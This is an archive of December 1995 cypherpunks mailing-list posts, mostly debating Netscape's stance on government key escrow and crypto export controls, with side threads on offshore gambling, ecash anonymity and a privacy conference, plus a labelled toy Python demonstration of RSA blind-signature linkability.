From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 3 Dec 95 12:21:29 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
In-Reply-To: <199512031807.TAA07090@utopia.hacktic.nl>
Message-ID: <199512032022.OAA02418@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> >I don't expect Netscape, as a corporate citizen, to engage in civil
> >disobedience.  But I hope that Netscape will take seriously its obligation
> >to protect the rights of citizens. 
> 
>       I do. I regard the capacity to do so as crucial, and I regard the
> fact that you *don't* expect them to as very telling. As has been pointed
> out extensively, the chances that he'll manage to hang on to his
> soft-earned cash until he can sell out are a long shot--unless he takes a
> stand against GAK. 

I don't know much about the market.  I can't say whether or not the market
will continue to value Netscape at $5 billion -- I never believed it would
happen in the first place.  If I walked outside and saw the skies filled
with pigs, and then you asked me when pigs will stop flying, I'd have to
say, "I don't know."  It's a lot easier to answer, "when will pigs fly?"
than, "when will pigs stop flying?"

It seems likely to me that the bubble's going to pop one way or another,
but again, I don't really know what I'm talking about. 

But I don't think Netscape can approach their business that way anyway. 
The market is going to do what it wants, and all they can do is try to
sell browsers and servers. 

> Governmental policy on the subject of crypto has relied
> upon secrecy, obscurity, and above all terrorizing individuals; the gov't
> would be extremely reluctant to throw the book at Netscape, given its
> symbolic significance in the market. And even if it did, Clark's future
> would be assured--maybe after he got out of Club Fed, but assured
> nonetheless.

Clark's future is already assured.  So what if the bubble pops?  If
Netscape lost 90% of its value it would still be valuable.  The only time
$500 million doesn't look like an awful lot of money is when you compare
it to $5 billion. 

You're not seriously expecting Clark to expose himself to the risk of 
jail time, are you?

>       Let me be clear: if Clark and Netscape said "We're implementing and
> releasing a version with a key length we support," crypto policy would be
> the lead story on the evening news--and the gov't would lose. The only
> question is how fast. 

I agree with you that the government will lose a public debate about GAK 
and crypto export.  I just don't believe that defying the law is the way 
to go, or more accurately, that there's a snowball's chance in hell 
that Netscape would do it.

If you want to talk about what would pop the bubble the quickest, running 
around like a loose cannon and defying the law would have to be right up 
there.

> >The decision that Netscape is faced with now is a big one.  It's going to 
> >have widespread and long lasting consequences for privacy and civil 
> >liberties all over the world.  When you look at what's going to happen on 

[...]

>       You set forth all these silly generalities as though they suggest
> that NS's best bet--for Clark, for itself, for the public--is to go along
> with US policy? Bullshit. Their best bet is to use their golden-boy status
> to sucker punch the gov't.

Your criticism of what I wrote is valid, to a certain extent.  I was
making general and simplistic arguments.  Sometimes they're the best
arguments.  Read the Contract with America or watch some of the "Why We
Fight" movies. 

And I'm not laying any claims to saying anything new here.  I'm not 
contributing anything in the way of analysis.  On the contrary, all I'm 
doing is pointing out the obvious.

There are two degrees of victory here.  The first is to have access to
strong crypto, legal or not.  That's already won.  If you've got a copy of
Applied Cryptography, you can pretty much do whatever you want.  There's a
lot of code out there, good tools exist and are easily acquired.  Sameer
has an apache ssl server that you can use instead of Netscape's commerce
server, and there are modified Mosaics that will talk to it. 

The battle we're fighting now is for legal access to strong crypto, and an
understanding on the part of the government that software engineers ought
to be able to build strong and secure international systems without
harassment.

You want some more platitudes?  The export restrictions on crypto are bad 
for business and they're not going to prevent the bad guys from 
communicating securely.  The genie is out of the bottle.

Crypto is rapidly becoming a tool that's essential to the operation of
even the most mundane business.  It's simply unrealistic to treat crypto
as a munition in a day and age when (a) everyone knows how it works, (b)
there are many thousands of people all over the world who have the ability
to write good crypto code, and (c) you have to use crypto to conduct your
business. 

The ITAR, as it relates to crypto, is hurting America's ability to compete
in international markets.  As more commerce moves online the damage
inflicted by ITAR will intensify drastically.  If Netscape takes that
argument to the business community, they'll be supported, because it's
reasonable and because it's the truth.

This isn't just about Netscape.  It's going to affect Sun, AT&T,
Microsoft, Oracle, and countless smaller companies.  It's going to affect 
the ability of GM to communicate internationally without falling victim 
to corporate espionage.

We're not selling snake oil here.  The cypherpunk position on crypto is
good for companies like Netscape, it's good for the economy generally, and
it's good for the political health and general well being of the republic.

> >        1       Netscape will follow all laws and regulations.
> >        2       The current rules are forcing Netscape to choose
> >                between providing reasonable levels of privacy
> >                to its customers and competing in the international
> >                marketplace.
> >        3       Netscape feels the rules should be changed to make
> >                this choice unnecessary.

I still believe this is the winning argument, and that both the public's 
and Netscape's interest will be served if they make it publicly and 
forcefully.

>       1     Make illegal software available by FTP
>       2     Explain it's doing so because ITAR is bullshit
>       3     Face the gov't down in the press and in the courts 

Go for it.  We're behind you 100%.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 3 Dec 95 13:07:29 PST
To: sameer@c2.org (sameer)
Subject: Re: prototype slot-machine
In-Reply-To: <199512031751.JAA01922@infinity.c2.org>
Message-ID: <199512031957.OAA00168@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > Try this site: Offshore Information Services in Anguilla,
> > http://www.offshore.com.ai/
> 
> Hey, fancy that, even though gambling is illegal in California you're
> saying that on a site two feet from my desk it's legal?
> 
> 	cool.

It's legal until someone makes some money at it. Soon as someone makes
enough to notice, then you can bet that the FBI/IRS/Dept. of
Agriculture (responsible for weights and measures in many locales) and
the local lottery commission are all going to come and take a piece of
the action.

Having a gambling establishment is something that, in America, is
reserved as a privilege solely for the capitalist elite. If you don't
have a big-ass bankroll and a rolodex full of connections to begin
with, you can expect to find your ass in jail and your possessions on
the auction block just as soon as someone takes notice of you.

But thanks to the InterNet, that's all changed. =)

I for one would be happy to pay all applicable income taxes to any
government that would allow me to host gambling via the net and
promise not to throw me in jail for making too much money too fast or
not following some outdated work ethic. Of course, you still run the
risk that you might wake up one night to find yourself surrounded by
Navy seals and assault copters, or that congress will mandate a
national firewall on your site or something equally extreme, but not
unless you are really living the good life.

=)

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 3 Dec 95 13:12:11 PST
To: master@internexus.net (Laszlo Vecsey)
Subject: Re: your mail
In-Reply-To: <Pine.LNX.3.91.951203113858.13147C-100000@micro.internexus.net>
Message-ID: <199512031959.OAA00178@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


My mail??

Who is the wise guy who keeps putting "Your mail" in the topic?

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmarquis@umich.edu (Robert Marquis, Jr.)
Date: Sun, 3 Dec 95 12:02:58 PST
To: cypherpunks@toad.com
Subject: Questions
Message-ID: <v01530502ace7ad85c8de@[198.109.36.28]>
MIME-Version: 1.0
Content-Type: text/plain


Hello.

I was wondering if anyone would be able to help me out.  I am writing a
research paper and I need some interviews for it.  If you could answer any
of these questions about security, I would greatly appreciate it.  Thanks
for your time.

--Bob Marquis

Please send responses to rmarquis@umich.edu


- How can PGP help secure something like e-mail?

- Are there any encryption schemes which are "unbreakable"?

- What would someone need to do to send an e-mail message which cannot be
read or altered by anyone else, or is it not possible?

____________________________________________
 Robert Marquis, Jr.
 University of Michigan - Dearborn

 e-mail: rmarquis@umich.edu
    www: http://www.umd.umich.edu/~rmarquis






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 3 Dec 95 13:10:56 PST
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Suggestion for CP browser
In-Reply-To: <9512031205.AA24992@all.net>
Message-ID: <199512032003.PAA00189@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> I think a CP browser is just the ticket to change the way the world works.
> How about this:
> 
> 	- CP writes a browser with PGP or better quality crypto.
> 	- CP makes it freely available to any individual
> 	- CP licenses it to corporations for $1 per copy
> 	- Funds produced go to support worthy causes, support a permanent
> 		home for CP, and support anti GAK efforts (lobbying, etc.)
> 
> I think the CP browser should include an embedded language (not Java -
> maybe a version of LISP) that does a far better job than Java of assuring
> limitations on what programs can do.  It should also support faking the
> source of a browser request (for privacy of the user), all forms of digital
> cash, firewall-type forwarding, pseudonyms, and all of the other things that
> CPs fight for.

I was just about to say something rude to whoever wrote this one, then
I noticed who it was.

Where is a clue hammer when you need one?

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Abelson <hal@martigny.ai.mit.edu>
Date: Sun, 3 Dec 95 12:34:26 PST
To: cypherpunks@toad.com
Subject: Sixth Conference on Computers, Freedom, and Privacy
Message-ID: <9512032034.AA10139@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




		      Please redistribute widely

	       ****************************************


The Sixth Conference on Computers, Freedom, and Privacy will take
place at the Massachusetts Institute of Technology on March 27-30,
1996.  CFP96 is hosted by MIT and by the World Wide Web Consortium.

Since its inception in 1991, the series of CFP conferences has brought
together experts and advocates from the fields of computer science,
law, business, public policy, law enforcement, government, and many
other areas to explore how computer and telecommunications
technologies are affecting freedom and privacy.

Registration for CFP96 will open on December 8.  

Conference attendance will be limited.  Due to the enormous public
interest in CFP issues over the past year, we encourage you to
register early.

SPECIAL NOTE TO STUDENTS: There are a limited number of places
available at a special student rate.  These will be allotted on a
first-come first-served basis, so register as soon as possible.

Events planned for this year's conference include:

    - Federal prosecutors square off against civil-liberties lawyers
      in a Supreme Court test of the "Cryptography Control Act of
      1996", which criminalizes non-escrowed encryption.
      
    - Authors Pat Cadigan, Tom Maddox, Bruce Sterling,
      and Vernor Vinge divine the future of privacy.

    - College administrators, students, lawyers, and journalists
      role-play scenarios that plumb the limits of on-line expression
      on campus networks.

    - Panels on international issues in privacy and encryption; on the
      struggle to control controversial content on the Internet; on
      tensions between copyright of digital information and freedom of
      expression; on threats posed by electronic money to law
      enforcement, privacy, and freedom; on mass communication versus
      mass media.

You can register for CFP96, starting December 8, by US Mail, by fax,
or via the World Wide Web.

For more information, see the CFP96 Web page at


		       http://web.mit.edu/cfp96


or send a blank email message to 

			  cfp96-info@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 13:11:16 PST
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: EXO_ner
In-Reply-To: <v03003e00ace6c5d1f9c1@[129.46.82.85]>
Message-ID: <Pine.SUN.3.91.951203161108.6588B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Dave Del Torto wrote:

> At 9:34 AM 12/2/95, John Young wrote:
> 
> >SenXon and The Washrag blow today about which has the most to
> >be ashamed of and hide from the filthy lingerie leering
> >republic.
> 
> Exon, Exoff, XON, X-off, Exxon, ex-off.

Wax on, wax off.

> 
>    dave
> 
> ____________________________________________________________________
> "Packwood's supporters were left groping for answers." --news anchor
> 
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 14:58:03 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <ace76787260210043e19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:09 PM 12/3/95, Pat Farrell wrote:
>I personally believe that this topic does not deserve the heat that it
>has generated on this list. This opinion could change. I'll have a much
>better idea Tuesday evening when I've had a chance to hear the latest from
>NIST on GAK for export.

Well, people discuss what they think is important. Those who don't think
this topic is important are of course not compelled to participate in the
debate.

>I think we need to save our fury for real statements about making
>non-GAK illegal for domestic use. If this starts to condense out
...
>I have no problem with Netscape having a GAK-ified browser in addition
>to a real one. At least as long as the GAK'd version is clearly identified
>-- a logo saying "big brother inside" covering 25% of the screen should
>do it for me.

These two points are what many of us are concerned about. Some may argue
"Wait until it's illegal, then protest," but I think the Cypherpunks list
has shown a particular strength in spotting "early warning signals" well in
advance of actual developments, thus enabling us to get our ducks in line
and hit the ground running (to mix some metaphors).

Is it too early to worry about outlawing of non-GAKked crypto? Hal Abelson
has this in the preliminary program for CFP '96, sent out today:

"Events planned for this year's conference include:

    - Federal prosecutors square off against civil-liberties lawyers
      in a Supreme Court test of the "Cryptography Control Act of
      1996", which criminalizes non-escrowed encryption."

...
>It was quite clearly implied at the September meetings that the
>Government expected that vendors would do only one version, GAK'd.
>This would allow the LEAs to tromple all over US civil liberties
>at will.

This was my point about having a domestic and an export version. (You
mentioned that Netscape already does this, and in fact probably has 10 or
more versions, for various platforms. Fine. Many of us want to keep it that
way, especially with regard to GAK. Saying that Netscape wants "a single
version with crypto suitable for all" is not OK if that version includes
GAK. This is what I am urging Netscape to take a stance on, now, soon,
quickly.)


>Tim's suggestion of a formal statement that separates domestic product
>from export, and clearly leaves GAK out of US products, is a very good one.
>It is close to what Netscape is doing now, it is completely consistent
>with current and publicly announced policies, and it would
>let this list return to discussions that are relevant to
                                              ^^^^^^^^^^^
>cryptography.
 ^^^^^^^^^^^^

Pat, if the policies and technologies surrounding key escrow are not
relevant to the themes of the Cypherpunks list, I surely don't know what
is!

That so many people are commenting on this topic, and not, say, on a more
"relevant" topic such as "Fermat factorization and the rho method in
elliptic curve cryptosystems" tells us what the apparent focus of the list
is. (Fact is, there are only a handful of folks on the list--and perhaps in
the world only a few hundred--who have strong competency in these
areas....asking that the list confine itself to discussions
"relevant to cryptography" is pointless. Technical cryptography is probably
better handled in sci.crypt or sci.crypt.research, or at conferences. And
"How to Use PGP" questions are better handled in many other places. Just my
opinion. Others are of course welcome to discuss how to use PGP or the
intricacies of quadratic reciprocity, just as I will feel welcome to
discuss key escrow in its various forms and implications.

People talk about what matters to them, for the most part, and attempts to
"steer" the list to other topics are best done by example. That is, write
up a really interesting article on some "relevant" topic and perhaps people
will discuss it. That seems better than saying a discussion of GAK is not
relevant.

And the NIST/NSA meeting is coming up in a few days...what better time to
discuss some issues, and thus possibly trigger some ideas or arguments for
attendees to make, than now? What's the point of waiting until it's over,
when all we can do then is complain?

I think key escrow, whether of the Clipper variety or the SKE variety, is
central to the themes of the group.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 95 13:22:35 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Questions/Comments on ecash protocol
In-Reply-To: <v02120d05ace6ea8784af@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.951203161754.5019E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Lucky Green wrote:

[..cuts...]

> At 22:40 12/2/95, Michael Froomkin wrote:
> 
> >3) Is there a way [how hard is it] for charlie to extract a coin and
> >either
> >   (i) copy it and/or
> >
> >   (ii) send it to David [3rd party] in such a way
> >that David could insert it into David's MTB software and then spend it to
> >Sam without Sam or the Bank noticing that anything was wrong.  If Charlie
> >and David do this, David now has a coin that is from his point of view
> >both payee and payor anonymous, although Charlie has a risk that David
> >will double-spend and expose Charlie to the bank's wrath.
> 
> I can't help the feeling that I am missing something whenever you bring up
> this question. Assuming it could be done. What would David gain? He as the
> payor is anonymous to Sam either way. Sam still would have to be worried
> about being identified, since if Charlie gives David access to Charlie's
> wallet, it is safe to assume that Charlie will give David (and the mint)
> access to his blinding factor. Which in turn would reveal Sam as the payee.
> 
> The protocol you suggest gives the parties exactly what they would have if
> they just used Ecash "out of the box": full payor anonymity, no payee
> anonymity. So why bother?
> 
These scenarios only matter if the blinded coins have payer info coded 
into them.  With zero payer info you are correct they are irrelevant.  I 
was operating under the (incorrect, it seems) assumption that the blinded 
coins followed what I now understand to be the OFF-LINE ONLY version of 
the protocol.  In that version, where the blinded coin issued to Alice 
has info about her coded on to it and/or there is information about payee 
encoded onto the coin, then such exchanges are necessary to create payee 
anonymity.

Even with the current protocol, you can achieve payee anonymity if you 
send a coin to a coin clearinghouse that deposits for you.  Alice gives 
Bob a coin for value.  Bob turns the coin over to Carol who, for a small 
fee, deposits the coin.  Now the bank knows Carol deposited the coin, but 
knows of neither Bob nor Alice.   Indeed Bob need have no account at the 
bank at all.  I recognize that there are issues here, esp. for Bob -- 
does he wait on line while Carol clears the coin before telling Alice 
that payment cleared (delays?).  Or does he bear the risk?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.
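
Added example, not part of the original message or of any ecash software: Lucky Green's quoted point that handing the mint a blinding factor reveals who is behind a coin. It assumes a Chaum-style RSA blind signature; the toy key, serials, factors, account labels and function names are all constructed for illustration.

```python
"""Toy RSA blind-signature coin: what the bank can and cannot link."""
import hashlib

# Constructed toy bank key from two Mersenne primes; far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private exponent


def coin_hash(serial: bytes) -> int:
    """Map a coin serial number to an integer modulo N."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blind(serial: bytes, r: int) -> int:
    """Withdrawer hides the coin: H(serial) * r^E mod N."""
    return coin_hash(serial) * pow(r, E, N) % N


def bank_sign(blinded: int) -> int:
    """Bank signs the value it is shown; it never sees the serial."""
    return pow(blinded, D, N)


def unblind(blind_sig: int, r: int) -> int:
    """Dividing out r leaves an ordinary signature on H(serial)."""
    return blind_sig * pow(r, -1, N) % N


def verify(serial: bytes, sig: int) -> bool:
    return pow(sig, E, N) == coin_hash(serial)


def factor_that_would_fit(serial: bytes, blinded: int) -> int:
    """Some blinding factor exists that maps this coin onto ANY logged
    withdrawal, so the log alone tells the bank nothing about which
    withdrawal produced a deposited coin."""
    x = blinded * pow(coin_hash(serial), -1, N) % N
    return pow(x, D, N)


def link_with_factor(serial: bytes, r: int, withdrawal_log):
    """Once the real factor is disclosed, recompute the blinded value and
    look it up in the withdrawal log: the coin is now tied to an account."""
    target = blind(serial, r)
    return [acct for acct, b in withdrawal_log if b == target]


def demo():
    # Constructed sample data: two accounts each withdraw one coin.
    serial_a, r_a = b"coin-serial-0001", 123456789
    serial_b, r_b = b"coin-serial-0002", 987654321
    log = [("acct-A", blind(serial_a, r_a)),
           ("acct-B", blind(serial_b, r_b))]
    sig_a = unblind(bank_sign(log[0][1]), r_a)

    # Every log entry is consistent with the deposited coin (unlinkable).
    fits_all = [blind(serial_a, factor_that_would_fit(serial_a, b)) == b
                for _, b in log]
    return {
        "coin_valid": verify(serial_a, sig_a),
        "every_withdrawal_fits": fits_all,
        "linked_after_disclosure": link_with_factor(serial_a, r_a, log),
        "linked_with_wrong_factor": link_with_factor(serial_a, r_b, log),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```
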






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Sun, 3 Dec 95 14:30:09 PST
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Globally legal Netscape
In-Reply-To: <9512032146.AA07279@all.net>
Message-ID: <9512031626.ZM17818@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


look, this is just a *bit* extreme.  having been one of those folks sworn
to uphold the Constitution, i can tell all of you that there is no master
plan to rid the American people of their rights and freedom.

this is not to say we should not keep a sharp and keen eye open for any
assault upon our liberties.  rather, having "BEEN THERE", i just do not
see any threat along the lines of, er, Hitler, Stalin, Mussolini, et. al.

let's try to keep this in perspective, Fred.  perhaps a little less
caffeine would help?  ;-)

regards,
--robert,
a former U.S. government employee...but i won't say where...;-)
--

o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
o       E-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@Cymru.COM        o
o               Vox:  708.435.7076   Fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 95 13:41:18 PST
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Talking to Jim
In-Reply-To: <199512031730.SAA06145@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951203161502.6588D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Anonymous wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Jim Clark was quoted as having written:
> 
> > I made some pragmatic comments.
> 
> > I said that if we are to use this encryption technology in 
> > business, we must have a better solution than to limit 
> > keylength or put keys in escrow. All governments of the world 
> > have a valid concern about terrorism and other activities of 
> > concern to the security of their nations. 
> 
> So what?  If their position were (as it has long been in some countries)
> that their "concern" is best addressed by wholesale eavesdropping and
> informant networks, would you cave to that, too? This is an absurd
> foundation.

Worked great in France, right?  No terrorist problems there or anything.

> > All of them will continue to restrict our ability to provide 
> > products to their markets unless we build in some mechanism 
> > that allows them to legally access information that is in the 
> > interest of their national security. 
> 
> Whoa!  You're giving away the store without a fight!  You've been able to
> capture what, 60-70% of the browser activity "market" and get a huge 
> amount of capitalization from the public market, and you're whining that 
> the world's going to end if government "restrictions" continue, just 
> because those restrictions might slow down your commercial world 
> conquest? Give me a break!

Mr. or Ms. Anonymous here has hit on the nose what irritates me about 
Netscape's attitude.  For them opposing GAK is not voluntarily installing 
it into their software, sending a lackey (who may or may not know squat 
about how to schmooze Washington and beltway fever types) to babble at a 
conference, and generally snowjobbing the educated portions of the 
marketplace by claiming to be on their side in opposition to GAK.

I am reminded of a certain dictator of a certain canaled nation whose 
anti-drug rhetoric was the strongest voice in Central and South America 
for a time.

> LET THEM CONTINUE to restrict! That will take care of itself quite 
> handily. You're just afraid you'd miss some opportunities, or be one of 
> the commercial casualties, isn't that right? Isn't that what this is 
> really all about?

I think it's more about laziness actually.  Netscape would (should) see 
quite quickly that key escrow is going to hurt them in the foreign 
market, and to some extent in the United States.  One would expect them 
to discover this and be screaming bloody murder.

As I have said before, as I will repeat, I'm sure the list is tired of my 
babbling, Netscape has a voice.  If Netscape were to scream and yell that 
GAK is unacceptable, people would take notice.  What does Netscape have 
to lose exactly?  If they still make GAK the law of the land, Netscape 
is, of course, probably going to comply.

_What does that have to do with trying to prevent it from ever being made 
the law of the land?_

I am saddened that the company which has so much power today to further 
the technology, the freedom and velocity of information, and privacy, is 
such a bowl of pudding.

> And a valid concern, too, but not at the expense of my 
> freedom! It seems clear from the way you put this that world 
> standardization at ANY level of security would satisfy your commercial 
> objectives.

Which is a silly objective considering the inviability of a NSA designed 
escrow system in any foreign market.

> > (We obviously cannot be involved in determining what is legal 
> > by the laws of that country.) 

Determining the falsehood of this statement is left as an exercise for the 
reader.

> 
> > This is not just a US government problem. Until recently, 
> > France did not even allow us to sell products with 40-bit 
> > keys, much less 128-bit keys. 
> 
> And some of us think that such idiocy, like celibacy, is a 
> self-correcting phenomenon in this information age.

Why any company would model their efforts after the French government is 
a complete mystery to me.

> > A lot of ordinary citizens are rightly concerned about their 
> > own privacy. 

Here comes the snow job.

> 
> > I am one of them. 

It's going to be a white Christmas honey.
> 
> > I do not want the government to snoop on me, 
> 

Did you buy road salt?

> > but in fact the government, through the FBI, can now tap my 
> > phone without my knowing it by simply getting sufficient 
> > evidence that I am conducting illegal activities, then 
> > presenting this evidence to a court to get permission. I have 
> > no say in the matter.

Gee, let's make sure they can do it for Netscape too!

> > If we as a company were to take the position that in no case 
> > will we allow a government to get access to our encrypted 
> > messages, or refuse to allow key escrow with our products, 
> > the governments of the world will quickly put us out of 
> > business by outlawing the sale of our products in their 
> > countries. 

Wow.  Where did you learn your economics?

In the alternative, where did you learn your propaganda skills?
This sounds like School of the Americas Stuff.

> I believe you have underestimated the power of a leading-edge 
> 21st-century information product that is "Not available where 
> regulated." I think you're copping out and looking for the easier, "Now 
> with the best encryption available! (because no one is allowed to offer 
> better)"

In fact, if Netscape really wanted to do well, they should be promoting 
their product, which I might add has a strong showing in the 18-24/5 
bracket- precisely that bracket likely to fret over government involvement,
as "Crypto so strong, it is banned in (x) countries!"

> > The fundamental issue is how do we accommodate the 
> > requirements of governments, while protecting our 
> > rights as citizens.

WOAH!  Now I'm REALLY pleased I sold my stock.

They bloody well SOUND like the NSA.

> > None of this represents the position of Netscape with 
> > respect to what we will do. 

Perhaps, perhaps not.  It sure seems to represent the attitude we can 
expect even from the 'pro crypto' types in Netscape.  If this is the 
limit of your potential....

> > But if we do not come up with a solution to this problem 
> > that is acceptable to each government, 
> 
> There it is:  Supine, prostrate, submissive.

Jim, and Netscape in general, simply has no idea what-so-ever what kind 
of sword they are carrying.  Someone needs to give them a shot of 
something.

> 
> > In fact, we could even be ordered by our own government to 
> > establish a key escrow system for its use inside the US.
> 

The way you are going, you will.  Why, as you sound so upset about this, 
aren't you DOING something?  Why aren't you out behind a podium pounding 
your shoe with:

"We will not accept GAK, it is wrong, we will bury you."

The time for submission and kissupping, for which there will be MUCH 
time, is AFTER GAK is mandatory.  (Some might argue that this is the time 
for work to have it repealed, but they don't know much about institutions 
in the U.S.)

> 
> > Ironically, anyone in the US may import unbreakable 
> > encryption technology from another country -- we just 
> > cannot sell it back to them. No one ever accused the 
> > government of being rational.
> 




> This is the clearest thing you've written in the whole piece

He is confused.  He knows the issue, he just doesn't know what to do.  
Like a child with a firearm.

> > I chair an industry group called the "Global Internet 
> > Project", with members from almost twenty companies, 
> > including companies from Asia and Europe. This was the 
> > central issue we all agreed upon this morning, and we 
> > are putting together a policy statement whose purpose 
> > is to educate lawmakers on the importance of quick 
> > resolution of this matter.

Wow.  You have done more damage than you know.

A quick resolution is going to be to your detriment.

"Diamond, oh Diamond, you know not the mischief done."

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 13:49:24 PST
To: cypherpunks@toad.com
Subject: Globally legal Netscape
Message-ID: <9512032146.AA07279@all.net>
MIME-Version: 1.0
Content-Type: text


If Netscape wants a global product that is completely legal anywhere,
all they have to do is eliminate all encryption.  The deal they are
cutting now is to claim that they provide privacy when they do not. 

The saddest part is that many people will believe they are secure:
-> the credit card companies and ecash banks will charge interest
   on every transaction to pay for the fraud rates,
-> the government will close its grip even tighter on individual
   freedom and get an even tighter stranglehold on free speech,
-> politicians and right wing demagogues will begin to expose
   individuals for having abortions and reading smut and thinking
   the "wrong" way.

I'm not asking you to believe this - only to look at history and see the
parallels throughout time.

	- The Russian revolution resulted in purges killing hundreds of
	thousands of innocent people because of their private, turned
	public, views as espoused in their private writings.

	- The Soviet government took away personal privacy to keep their
	stranglehold on their people.

	- The Chinese government used cameras and other similar
	privacy-removing techniques to track down the peaceful
	protesters who stood for free speech in Tiananmen Square. 

	- The Germans under Hitler used personal records to identify and
	murder millions of Jews and other peoples.

These are just four examples selected from this century! There are
many more in each century.

Personal privacy - freedom from unreasonable search and seizure - the
right to bear arms - all of these tell me that the US constitution
secures the ability of Americans to have secure personal encryption in
the information age.

The president of the United States, each member of congress, and each
CIA and NSA and FBI agent swears to God that they will protect and
defend these rights as a condition of taking their offices.  Those that
fail to support the constitution in this way should be tried as traitors.

But instead, we see these people coercing Netscape into breaking the law
on their behalf. Breaking the law by cooperating with the government in
illegal search and seizure, breaking the law in preventing Americans from
attaining privacy, and breaking the law by defrauding the public with false
claims of privacy protection.

This is the time for Netscape to prove itself to the public by taking a
stand for the Constitution, for the law of the land, and for the people
of the United States and the world.

If Jeff the Netscape munitions expert sees this, I hope he forwards it
to his boss, and I hope his boss considers seriously that he may be the
instrument of a totalitarian state arising in the US and throughout the
world.

It's easy to say that you're not responsible and that it's the
government's fault, and that you're just following orders.  But there is
an old saying - evil flourishes when good people do nothing.

If money is what you worship, you can get it by standing on the dead
bones of your fellow human beings.  Hitler did it, it was done in the
Russian revolution, it was done in the Soviet Union, it was done in
China, and it will be done again and again, as long as the Netscapes of
the world fail to make a stand when it counts.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sun, 3 Dec 95 14:09:25 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <61765.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I personally believe that this topic does not deserve the heat that it
has generated on this list. This opinion could change. I'll have a much
better idea Tuesday evening when I've had a chance to hear the latest from
NIST on GAK for export.

Much of the complaining in September was that vendors didn't want
to build two versions, one domestic and one for "export".
Netscape is currently doing at least two, and probably closer to
ten if you count Windows 16, 32, Mac, Motif, etc.

  tcmay@got.net (Timothy C. May)  writes:
> Netscape, being the dominant browser company, and Microsoft, being the
> dominant OS company, are in special positions to "build in Big Brother."
> I'm not claiming they are, just that they are clearly in a position to
> make it technologically more feasible to make non-GAK illegal. They both
